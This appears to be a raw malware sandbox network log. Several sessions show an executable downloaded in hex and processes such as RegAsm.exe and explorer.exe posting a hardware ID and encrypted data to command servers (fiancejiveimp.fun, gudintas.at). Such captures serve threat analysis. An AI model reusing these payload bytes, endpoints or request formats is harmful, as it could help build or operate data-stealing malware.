2a 00 00 13 30 03 00 4d 00 00 00 03 00 00 11 2b 05 28 93 46 6b 4b 38
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP11 2@ 3p4@1K23 3k1 H.text$1 1 `.rsrc21@@.reloc33@B1HhDh :+(5E(*V+(,?(8*B+(J:~*6+(f6a~*0+(*Me8E/KkJ8*s8s 9&8s :&8*s :& 8s 8l0Z+(W0\ 8E'8"~o (9&888*0M+(FkK8
                                                                    Oct 3, 2023 09:55:07.486490965 CEST1569INData Raw: 2f 00 00 00 fe 0c 01 00 45 01 00 00 00 1f 00 00 00 38 1a 00 00 00 38 15 00 00 00 20 00 00 00 00 28 0b 00 00 06 3a de ff ff ff 26 38 d4 ff ff ff 11 00 2a 00 7e 03 00 00 04 6f 1b 00 00 0a 13 00 38 d1 ff ff ff 00 00 00 13 30 03 00 5a 00 00 00 04 00
                                                                    Data Ascii: /E88 (:&8*~o80Z+(</7 8E*8%~o (9&8*880Z+(\ 8E*8%~o
                                                                    Oct 3, 2023 09:55:07.486551046 CEST1570INData Raw: 2a 00 13 30 03 00 48 00 00 00 13 00 00 11 2b 05 28 24 2b 3c 42 38 2f 00 00 00 fe 0c 00 00 45 01 00 00 00 1f 00 00 00 38 1a 00 00 00 38 15 00 00 00 20 00 00 00 00 28 3c 00 00 06 3a de ff ff ff 26 38 d4 ff ff ff 11 01 2a 00 7e 11 00 00 04 13 01 38
                                                                    Data Ascii: *0H+($+<B8/E88 (<:&8*~8J+(,WPI(:*B+(4'/S~*6+(K{7~*0U+(>6 8E%8 (? (@:&8*88:
                                                                    Oct 3, 2023 09:55:07.486633062 CEST1572INData Raw: 00 8c 09 00 00 33 1b 03 00 43 37 03 00 83 fa 00 00 47 27 01 00 ea 20 01 00 a5 bf 02 00 90 37 01 00 7e 0f 02 00 4d a9 00 00 03 eb 01 00 23 12 00 00 dc 4a 00 00 56 ec 01 00 0b da 01 00 55 b1 01 00 78 34 03 00 eb 2a 02 00 66 36 03 00 00 5c 01 00 f9
                                                                    Data Ascii: 3C7G' 7~M#JVUx4*f6\dF3%8=aD{BUy=@?:PEi|@7 u\+9e|WMe
                                                                    Oct 3, 2023 09:55:07.486666918 CEST1573INData Raw: 6a 01 00 a4 5d 02 00 00 1f 03 00 bf 2b 02 00 0d 09 01 00 e8 12 03 00 56 20 03 00 64 f0 00 00 76 0a 02 00 aa 3a 01 00 82 d6 01 00 f7 08 03 00 22 75 01 00 9b 52 02 00 81 cb 00 00 74 25 03 00 8a f5 00 00 e8 39 00 00 a5 06 02 00 53 df 01 00 9e af 02
                                                                    Data Ascii: j]+V dv:"uRt%9SefgCqC:|/ Iw9?mgoLYou/1w,6qJu}#p~,
                                                                    Oct 3, 2023 09:55:07.486728907 CEST1574INData Raw: 00 53 97 02 00 06 1d 03 00 79 64 02 00 b6 0f 01 00 2c e5 01 00 c2 86 00 00 a3 02 01 00 3a 14 00 00 2e 06 02 00 23 62 00 00 79 97 01 00 44 48 03 00 e6 d1 02 00 4f c2 01 00 25 ab 02 00 b3 6e 00 00 cc 9d 00 00 6f 30 02 00 3a 7b 00 00 67 94 02 00 4b
                                                                    Data Ascii: Syd,:.#byDHO%no0:{gK[E=n1T8:ui}_U!F-K0Bot'kwRwjbQnmkGdf
                                                                    Oct 3, 2023 09:55:07.486815929 CEST1576INData Raw: 65 02 00 20 90 02 00 50 08 02 00 24 37 02 00 43 29 03 00 2e d9 01 00 02 bc 00 00 92 ad 02 00 d5 f8 02 00 6f ad 01 00 db 46 02 00 cc bf 02 00 43 7f 00 00 da 1b 01 00 f6 0f 03 00 cb f3 01 00 29 8a 02 00 1b 69 01 00 7f db 00 00 07 86 00 00 ad 1e 03
                                                                    Data Ascii: e P$7C).oFC)i'"X0L/5Gnt;owy_g*MP12}uD{A,am4q_)x
                                                                    Oct 3, 2023 09:55:07.486898899 CEST1577INData Raw: 00 c1 1f 03 00 c2 2d 03 00 1a 3d 03 00 82 ae 02 00 28 1d 01 00 a0 f0 00 00 21 eb 01 00 21 9c 02 00 11 4a 00 00 0c a0 01 00 0e 55 00 00 9b 7f 01 00 0b 2a 02 00 ef af 02 00 23 b8 01 00 00 71 01 00 a8 24 02 00 88 8e 00 00 dc 36 03 00 ab 52 00 00 16
                                                                    Data Ascii: -=(!!JU*#q$6R\KN2wU)Axj9|grAG=0-"-{=&huTjV$iho^?
                                                                    Oct 3, 2023 09:55:07.486973047 CEST1578INData Raw: 92 00 00 d8 d1 00 00 c9 5d 01 00 ae aa 00 00 a4 51 02 00 bc fd 00 00 ef 58 00 00 60 fb 01 00 7e f1 00 00 1a 10 03 00 f8 08 02 00 ab 76 00 00 2a 0f 02 00 24 33 03 00 08 80 01 00 1c 4a 03 00 84 2f 03 00 ba 3e 00 00 39 70 01 00 f0 40 00 00 78 f2 02
                                                                    Data Ascii: ]QX`~v*$3J/>9p@x;l!/>+pUJt+@tMW5ETW@kHlfHKJ5A
                                                                    Oct 3, 2023 09:55:07.487020016 CEST1580INData Raw: 00 18 28 03 00 71 ed 00 00 a2 1c 00 00 de 3b 00 00 e0 b4 00 00 ac fa 01 00 54 a6 00 00 3a 4f 00 00 8e 20 02 00 8f 07 03 00 b3 05 02 00 42 da 02 00 92 2a 02 00 11 02 02 00 a0 7c 01 00 f5 b5 02 00 8f 9b 01 00 21 67 02 00 b8 70 00 00 2e 13 01 00 0c
                                                                    Data Ascii: (q;T:O B*|!gp.iXvSO*;>`}LA`z/'hs K7-v9i.90>m"?@v6s[
                                                                    Oct 3, 2023 09:55:07.708275080 CEST1581INData Raw: 67 01 00 a2 d8 01 00 1b d7 00 00 08 58 02 00 11 06 01 00 e2 0f 02 00 62 31 00 00 98 5b 01 00 b8 b4 01 00 32 24 03 00 02 a4 00 00 46 79 00 00 4d c9 02 00 18 fe 01 00 1d 15 02 00 c4 64 01 00 ee 1e 02 00 c8 95 02 00 03 19 03 00 f0 db 01 00 d7 1d 02
                                                                    Data Ascii: gXb1[2$FyMdIxI{9I{{Q(TrK`.147&K2)fMvEN9h3o [AgH


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    12192.168.2.349826186.182.55.4480C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:11.228462934 CEST5285OUTPOST /tmp/ HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://uhjls.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 191
                                                                    Host: gudintas.at
                                                                    Oct 3, 2023 09:55:11.228487968 CEST5285OUTData Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 03 6b 2c 90 f4 76 0b 75 79 28 d2 ed
                                                                    Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA ,[k,vuy(0a5)%^I_JtY#"Qe UHqzFXDM^~J
                                                                    Oct 3, 2023 09:55:12.165592909 CEST5377INHTTP/1.0 404 Not Found
                                                                    Date: Tue, 03 Oct 2023 07:55:11 GMT
                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                    X-Powered-By: PHP/7.4.15
                                                                    Content-Length: 331
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    13192.168.2.349829104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:12.132297993 CEST5376OUTPOST /api HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: fiancejiveimp.fun
                                                                    Content-Length: 54
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 72 49 77 68 6f 55 2d 2d 45 6c 76 69 6e 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30
                                                                    Data Ascii: act=recive_message&lid=rIwhoU--Elvin&j=default&ver=4.0
                                                                    Oct 3, 2023 09:55:12.460585117 CEST5381INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=ef23ebffv4qfh7q0h4tii9jelj; expires=Sat, 27 Jan 2024 01:41:51 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:12 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ESuqK77%2BGR7oJO3r%2B51OAIBUMpZ1lBQ%2BsZ06tciMVyG1UyGwF1Yu4%2F6frM%2FkBFLOfkGdui%2FmeAZISQkbE5NVOAN6V6XHnn%2FJhSLM0Q%2FgCxqupq2OzNqYiFXBcHvlL0%2F8B34MkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f190eae29b6-IAD
                                                                    Data Raw: 64 38 66 0d 0a 38 55 61 57 53 67 71 77 59 41 55 67 67 78 74 79 74 4a 79 33 69 30 55 68 79 57 65 55 4b 58 70 78 37 39 44 63 33 75 53 61 76 7a 75 4b 53 35 78 71 4b 70 42 41 4a 31 61 68 49 56 4b 41 73 4c 71 42 5a 51 48 70 52 37 5a 61 48 31 50 56 38 4b 69 73 6b 66 2b 54 4e 76 74 6d 74 6d 6f 71 6b 67 46 68 41 72 6b 37 46 4e 58 77 78 4f 35 70 4c 4d 4e 48 74 41 6c 61 55 34 71 6f 2f 75 54 45 77 62 49 78 30 57 61 32 61 69 71 51 47 77 67 71 6f 7a 74 53 6c 4c 79 58 71 32
                                                                    Data Ascii: d8f8UaWSgqwYAUggxtytJy3i0UhyWeUKXpx79Dc3uSavzuKS5xqKpBAJ1ahIVKAsLqBZQHpR7ZaH1PV8Kiskf+TNvtmtmoqkgFhArk7FNXwxO5pLMNHtAlaU4qo/uTEwbIx0Wa2aiqQGwgqoztSlLyXq2
                                                                    Oct 3, 2023 09:55:12.460642099 CEST5383INData Raw: 55 44 72 41 6d 32 45 31 70 54 69 72 71 2b 76 34 6a 34 33 6c 43 65 4e 76 6f 70 59 74 77 48 62 55 58 67 66 78 50 59 38 64 4c 75 49 45 43 6a 43 66 31 45 45 68 7a 4e 2f 4e 48 55 78 4c 71 66 47 39 46 6d 74 6d 6f 6f 31 52 6f 6e 47 71 4d 35 50 39 48 6f
                                                                    Data Ascii: UDrAm2E1pTirq+v4j43lCeNvopYtwHbUXgfxPY8dLuIECjCf1EEhzN/NHUxLqfG9Fmtmoo1RonGqM5P9Ho1sYkUqJFmSNaUc/w/P6ZtrIx0Wa2aiqQGwgqoztSlLyXq2UDrAm2E1pTgbu+t4z83V6eIfcva98FbUzmfRzf89PpIEeuF/NCFB/N/NHUxLqfG9Fmtmoo1RonGqM5P9Ho1sYkUqJFmSNaUc/w/P6ZtrIx0Wa2aiqQG
                                                                    Oct 3, 2023 09:55:12.460715055 CEST5384INData Raw: 43 56 70 52 7a 2f 44 38 2f 49 48 30 6e 51 48 52 5a 50 34 36 62 64 77 47 62 55 66 6c 64 52 72 57 2b 38 66 68 49 55 53 6e 44 66 4e 45 48 68 61 41 74 62 57 2f 6c 4f 72 65 58 5a 30 6f 74 47 59 48 75 6b 41 6c 41 4b 4d 37 55 70 53 38 6c 65 34 2f 41 2f
                                                                    Data Ascii: CVpRz/D8/IH0nQHRZP46bdwGbUfldRrW+8fhIUSnDfNEHhaAtbW/lOreXZ0otGYHukAlAKM7UpS8le4/A/NHtm4PEJ20vfzpkJ8b0Wa2anecbQ8AoztSlLzMhk8B6Ue0CVpRz/K5sMagnxmTKvgjb9kJY0bhdBvY8NzlL0+sF/tOEBmEt7KxhereWNNqm0AqkEAlAKM7Upb5zal/AesixXw7U+La/P7Eup8bjGqbQCqQQCUAo2B
                                                                    Oct 3, 2023 09:55:12.460733891 CEST5385INData Raw: 32 35 73 59 44 30 31 31 43 62 49 76 73 68 65 74 45 4f 61 55 58 76 64 52 37 62 39 4e 62 6b 5a 77 33 45 62 62 51 4a 57 6c 48 50 38 50 7a 2b 78 76 2f 46 47 63 74 6d 74 41 52 76 33 79 78 73 54 75 59 35 66 37 36 38 6c 36 74 6c 41 65 6b 61 75 43 52 77
                                                                    Data Ascii: 25sYD011CbIvshetEOaUXvdR7b9NbkZw3EbbQJWlHP8Pz+xv/FGctmtARv3yxsTuY5f768l6tlAekauCRwUc/w/P7E4bIx0Wa2aiqQQCUC5nVQjryV5S1PogX/ThAYhLe/t4P721ScLeYia9wBa07neBPE9typaSzDR7QJWlHP8Pz8geCdAdFk1SZlxgV3Ao4RUpS8l6tlXOVqniBaUZTd1v7Eup8b0Wa2aG/eQj8AoXoR2f3U5
                                                                    Oct 3, 2023 09:55:12.460822105 CEST5386INData Raw: 33 32 65 31 0d 0a 65 33 66 72 5a 34 43 78 4b 72 67 6e 33 51 42 45 57 69 62 69 34 73 63 61 32 73 6a 48 52 5a 72 5a 71 4b 70 42 41 4a 51 4c 6d 59 56 43 4f 76 4a 58 46 4a 45 79 67 52 5a 6b 6a 57 6c 48 50 38 50 7a 2b 6d 62 61 79 4d 66 78 4d 6e 32 6f
                                                                    Data Ascii: 32e1e3frZ4CxKrgn3QBEWibi4sca2sjHRZrZqKpBAJQLmYVCOvJXFJEygRZkjWlHP8Pz+mbayMfxMn2oqy20PAKM7UpS8l6tnRKdFrglYFIW6sL+A89FVki3yLWDVDWBL5nkWxPnY4CdIog/yShNTw93W/sS6nxvRZrZob8pCPwChSxfA7tapSCvpR7QJWlGS/NXT7pOfG4pLnGoqkEAlAKM7UNHylbFlA6YX904KF4K5rLeA
                                                                    Oct 3, 2023 09:55:12.461010933 CEST5388INData Raw: 66 32 72 36 62 68 6b 38 42 36 55 65 30 43 56 70 52 7a 2f 4b 35 70 4d 61 67 6e 78 6d 39 4c 2b 63 2f 61 39 77 4a 63 56 6d 68 46 6e 69 55 76 4a 65 72 5a 51 47 30 53 35 6b 6a 57 6c 48 50 38 50 7a 2b 6e 35 65 31 47 39 46 6d 74 6d 6f 71 6b 45 41 6e 52
                                                                    Data Ascii: f2r6bhk8B6Ue0CVpRz/K5pMagnxm9L+c/a9wJcVmhFniUvJerZQG0S5kjWlHP8Pz+n5e1G9FmtmoqkEAnRe05SJS+1uIsR6sJ9k8VE5+9ubuP889TlCP/IGPdBHVO72sVxOyVp0gr6Ue0CVpRz/D+u564hRvTEvM4eNFAVlTibxvb8pWGTwHpR7QJWgzD3db+xLqfG9E9m0AqkEAlAKM7Upb52al/AesD+UIbHIy7srGD8dhYlS
                                                                    Oct 3, 2023 09:55:12.461095095 CEST5389INData Raw: 52 46 45 73 79 58 37 55 56 68 38 35 66 44 38 2f 73 53 36 6e 30 62 64 53 35 78 71 4b 70 42 41 4a 51 44 34 46 6e 69 55 76 4a 65 72 5a 51 48 70 52 37 5a 4d 46 46 50 56 38 50 36 79 69 2f 37 63 57 4a 73 73 39 43 35 69 31 67 46 75 51 65 5a 77 46 74 33
                                                                    Data Ascii: RFEsyX7UVh85fD8/sS6n0bdS5xqKpBAJQD4FniUvJerZQHpR7ZMFFPV8P6yi/7cWJss9C5i1gFuQeZwFt393+YgRa8F/UwWFYi5t/zIl7Ub0Wa2aiqQQCdF+TlIlL7zyjVRmQv1UFh85fD8/sS6n0bdS5xqKpBAJQD4FniUvJerZQHpR7ZMFFPV8P63jvfPXJos8CFo1ghqReF8HdP62+0gQ6cK8UMXF429/vLpkJ8b0Wa2aiqQ
                                                                    Oct 3, 2023 09:55:12.461220980 CEST5390INData Raw: 30 43 56 70 54 69 71 72 2b 35 4d 53 34 2f 55 4b 65 4b 50 4e 6f 42 37 70 41 4a 51 43 6a 4f 31 4c 4a 73 4c 71 42 5a 51 48 70 52 37 51 4a 41 58 7a 6c 38 50 7a 2b 78 4c 71 66 47 39 46 6b 38 79 51 6f 69 6b 41 6e 53 65 31 39 46 39 62 7a 31 75 45 69 52
                                                                    Data Ascii: 0CVpTiqr+5MS4/UKeKPNoB7pAJQCjO1LJsLqBZQHpR7QJAXzl8Pz+xLqfG9Fk8yQoikAnSe19F9bz1uEiR6EA9kMKG421rK6G8dhVkCTwLmHUAWMCrxZ4lLyXq2UB6Ue2TABT1fD+kYr/9F6IZJtAKpBAJQCjZl65lperZQHpR+8kcFHP8Pz+xLqfGZQotHAqkgNsSO50E9D93uwtQqwN+1kbHIK2vrOA/txWlSP9KWDVQiktiT
                                                                    Oct 3, 2023 09:55:12.461318970 CEST5392INData Raw: 66 44 2b 69 59 58 32 30 31 36 46 4e 62 6b 50 5a 74 55 44 63 56 4c 32 64 6c 43 59 6b 62 32 72 5a 51 48 70 52 37 51 4a 57 6c 4f 4c 38 75 62 2b 31 62 61 79 4d 64 46 6d 74 6d 6f 71 6b 45 41 6c 41 75 56 6f 55 49 36 38 68 62 74 38 46 76 68 53 70 68 6c
                                                                    Data Ascii: fD+iYX2016FNbkPZtUDcVL2dlCYkb2rZQHpR7QJWlOL8ub+1bayMdFmtmoqkEAlAuVoUI68hbt8FvhSphl3e8/w/P7EusIX/Ey2aiqQQCVbjhFSlLyXq2UB6UXgC0BR3/zR1MS6nxvRZrZqKMBCPwChPhPE7NPqMUDsO8hsDhmKormribiTNvtmtmoqkEAlAKF2UI687IZPAelHtAlaUc/w/P7EuNReiDXiJXjVQggqoztSlLyX
                                                                    Oct 3, 2023 09:55:12.461415052 CEST5393INData Raw: 34 32 78 6e 4c 5a 71 52 6d 42 37 70 41 4a 51 43 6a 4f 31 4b 55 76 4a 58 74 4e 67 50 7a 52 36 59 5a 51 30 62 65 35 65 37 75 36 5a 43 66 47 39 46 6d 74 6d 70 33 6e 47 30 50 41 4b 4d 37 55 70 53 38 7a 49 5a 50 41 65 6c 48 74 41 6c 61 55 63 2f 79 71
                                                                    Data Ascii: 42xnLZqRmB7pAJQCjO1KUvJXtNgPzR6YZQ0be5e7u6ZCfG9Fmtmp3nG0PAKM7UpS8zIZPAelHtAlaUc/yqPzeuo8X/Ey2aiqQQCUAozkClqaXqWBAuRfwSA4QyoyAn5Hu10LRAvM5YcQPdXzfVx3X/durFlWmFfVOHy2zvLmogfbbWdNqm0AqkEAlAKM7UpbxlbFleutNtnRWfOXw/P7Eup8b0WTsaDCQQlJB73cXwO+YyjBVoR
                                                                    Oct 3, 2023 09:55:12.461491108 CEST5395INData Raw: 76 4d 70 66 73 49 56 61 41 4b 76 46 6e 69 55 76 4a 65 72 5a 51 48 70 52 37 5a 4e 57 45 76 50 34 76 44 54 37 72 71 66 47 39 46 6d 74 6d 6f 71 6b 67 5a 32 41 72 6b 37 51 49 53 6c 67 4c 70 77 45 2f 6c 71 6e 67 6c 61 55 63 2f 77 2f 4b 50 49 6c 37 55
                                                                    Data Ascii: vMpfsIVaAKvFniUvJerZQHpR7ZNWEvP4vDT7rqfG9FmtmoqkgZ2Ark7QISlgLpwE/lqnglaUc/w/KPIl7Uy0WbtRwCQQCUAoztSlL7DqX8B+EuZI1pRz/D8/sS6nUvTfLZoL9wPZkHvegLE+Nb/JASVO9NGFRaDtYCCp/LNVJwjyhZfwwV3AMd6BtW+m4ZPAelHtAlaUc/ypvzeup14mTT5J2+SbQ8AoztSlLzKp0gr6Ue0CVpR


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    14192.168.2.349831211.181.24.13380C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:12.581852913 CEST5405OUTPOST /tmp/ HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://diludhd.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 123
                                                                    Host: gudintas.at
                                                                    Oct 3, 2023 09:55:12.581852913 CEST5405OUTData Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 28 47 b5 82
                                                                    Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA -[k,vu(Gx}d[^rYn9NJA
                                                                    Oct 3, 2023 09:55:15.114295959 CEST5512INHTTP/1.0 404 Not Found
                                                                    Date: Tue, 03 Oct 2023 07:55:14 GMT
                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                    X-Powered-By: PHP/7.4.15
                                                                    Content-Length: 59
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 52 39 08 a5 6c 53 b5 a9 1f a6 d0 b3 f9 7b db 21 d3 fc 30 51 1c 89 9d 8a dc 61 c3 2d 5a 06 8f 06 8b 4d 63 1d 51 a5 9e
                                                                    Data Ascii: #\(R9lS{!0Qa-ZMcQ


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    15192.168.2.349834104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:12.695708990 CEST5407OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:12.696086884 CEST5407OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:13.157402039 CEST5457INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=1i6l1cushmp3rgrfmg2dbscog6; expires=Sat, 27 Jan 2024 01:41:52 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:13 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mu1tP%2Bu1ESoPwX5SCQHZiOgxN2ascSgjnUwi3kBRYa618lCeKRllFj36o2Z2zAQMhTwmjo0Kb0wlFAy7eIKe3T%2FbUP2Pku%2BbXF8DKEDQXP2WDevJtNP1BIqsDZK0jleaIcNc1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f1c99242064-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:13.157427073 CEST5457INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    16192.168.2.349838104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:13.382550001 CEST5463OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:13.382993937 CEST5464OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:13.707520962 CEST5503INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=m2nbtptvccfn7192igtqs5jpfa; expires=Sat, 27 Jan 2024 01:41:52 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:13 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
